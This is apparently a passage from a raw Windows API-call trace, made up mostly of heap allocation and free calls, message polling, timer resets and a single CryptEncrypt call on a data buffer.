hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0264.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0264.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0264.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0264.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0264.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0264.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0264.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0264.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0264.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0264.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0264.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0264.528] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0264.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0264.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0264.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.529] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.529] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.529] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0264.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0264.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0264.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0264.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0264.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0264.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0264.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0264.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0264.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0264.530] CharLowerBuffW (in: lpsz="byte[63664]", cchLength=0xb | out: lpsz="byte[63664]") returned 0xb [0264.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0264.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0264.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0264.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0264.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0264.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0264.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0264.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0264.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0264.530] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0264.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0264.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0264.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0264.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0264.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0264.532] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0264.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0264.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0264.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0264.532] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.533] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0264.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.534] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0264.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0264.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0264.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0264.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0264.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51df0 [0264.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51df0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0264.534] CryptEncrypt (in: hKey=0xa875d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe50048*, pdwDataLen=0x8cef60*=0xf8af, dwBufLen=0xf8b0 | out: pbData=0xe50048*, pdwDataLen=0x8cef60*=0xf8b0) returned 1 [0264.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0264.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0264.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0264.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0264.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0264.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0264.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0264.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0264.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0264.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0264.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0264.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0264.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0264.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0264.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0264.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0264.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0264.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0264.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0264.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0264.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0264.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0264.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0264.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0264.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0264.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0264.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0264.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0264.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0264.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0264.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0264.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0264.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0264.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0264.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0264.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0264.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0264.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0264.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0264.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0264.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0264.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0264.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0264.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0264.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0264.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52180 [0264.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f70 [0264.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0264.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f70 | out: hHeap=0x970000) returned 1 [0264.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0264.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52180 | out: hHeap=0x970000) returned 1 [0264.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520a8 [0264.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0264.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520c0 [0264.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0264.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520c0 | out: hHeap=0x970000) returned 1 [0264.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0264.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52120 | out: hHeap=0x970000) returned 1 [0264.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0264.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14038 | out: hHeap=0x970000) returned 1 [0264.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14f50 [0264.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f157f0 | out: hHeap=0x970000) returned 1 [0264.541] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0264.542] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0264.542] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0264.542] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0264.542] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0264.542] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551c8 [0264.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551a8 [0264.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0264.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0264.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552d8 [0264.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0264.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0264.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0264.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0264.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0264.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0264.542] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0264.542] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0264.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0264.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0264.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 